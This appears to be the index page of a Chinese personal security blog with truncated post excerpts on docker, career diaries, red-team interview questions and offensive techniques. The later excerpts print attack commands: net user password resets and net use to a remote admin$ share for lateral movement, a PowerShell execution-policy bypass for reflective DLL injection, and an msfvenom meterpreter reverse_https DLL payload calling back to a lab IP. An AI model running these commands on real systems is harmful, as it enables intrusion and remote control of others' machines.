docker仓库(六) 引子最近收到一个任务,说要对云上工具基础设施建设与维护。姑且算是工作内容吧,然后最近一两年也会用到这个东西。于是学一学。 团队的云上的设施基本都在docker里 docker file的编写,和docker使用 docker仓库维护,推拉 docker仓库docker仓库是什么?它与registry、image有什么关系? registrydocker-registry 是官方提供的工具,可 2021-05-05 docker docker
【转载】高效学习攻防的一点思考及经验 ->当你拿到某个 “技术点”, 或是遇到某个什么所谓的”技巧” , 甚至是工具 之后,该如何进一步展开学习思考? 如下: 123456789101112131415161718191.-> 这TM 到底是个什么东西?2.-> "正常情况下" 它都被用在什么地方? 平时主要拿它来干啥? 或者说这个东西可以协助解决一些什么样的实际业务问题 ?3.-> 它在 2021-05-04 experience experience
卑微安服仔的一天 离开深圳,来到南京。 南京的地铁比深圳老旧很多,上地铁的人抢座很严重,就像生怕抢不到座位一样,门一开,乌拉拉冲上来一堆人。眨了下眼睛,身边空荡荡的座位就已经坐满了。 4月5日。老大叫我跟他一起去上海见见同事,团建。于是刚到南京,我就准备去上海了 == 因为昨天晚上几乎没睡(不知道是因为离开深圳,对未来很焦虑的原因吗),所以找了个旅馆,我睡到了下午。 下午5点出头,被电话的铃声惊醒,然后赶去地铁站, 2021-04-20 experience experience
应届生的面试题(五) 长亭hw红队面试1.不出网有什么方法,正向shel l 方法除了reg之类的,还有什么? 2.域内委派 3.dpapi机制说下,能干嘛 4.fastjson 不出网 5.shiro漏洞类型,721原理,721利用要注意什么? 7.weblogic 漏洞类型都有啥,原理 8.dll劫持,dll注入 9.内网优先爆破测试的端口、为什么;如果只有3389开放,爆破3389的实际影响… 10.windo 2021-04-16 Interview Interview
老年人的生活 最近换了一份工作。也跟三十岁左右的男性打了一些交道,感受到岁月的残酷。 高铁上看着坐在我右边的某人头发上的白发;我以为某大佬三十多了(35以上)其实他才29;micro8在每篇文章中都说要多喝水,因为喝水喝少了,得了肾结石。 我们马上就要老了。 工作步入了正轨。 我已经完成了18岁的我的诺言,要成为一个会拉小提琴的黑客。 已经过去好多年了。大半夜的忽然有些感慨。原来我也是给能给新人指点迷津的老师傅 2021-04-08 experience experience
横向移动:schtasks远程计划任务 视频教程:横向移动手法介绍 拓扑图 执行的命令1234567891011121314151617181920212223242526272829303132333435363738394041net user administrator 123456net user administrator qwe123!net use \\192.168.123.67\admin$ /user:"a 2021-04-04 windows windows lateral-movement
反射式dll注入的演示 Powershell反射式dll注入 dll注入和反射式dll注入的区别合法进程 恶意dll 从本地或者dll调用 【生成恶意载荷,并执行web服务托管dll】 省略 【目标机器载入内存,使用反射式dll注入直接载入内存不落盘】 1234567PowerShell -Exec BypassImport-Module C:\Users\whale\Desktop\Invoke-Reflecti 2021-03-09 evasion evasion
dll注入的演示 前景提要whale的DLLHijack本地提权教程 进程注入与迁移 本期内容dll注入的演示 1.exe 2.exe msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f dll -o whale.dll python -m SimpleHTTPServer 80 handler 2021-03-07 evasion evasion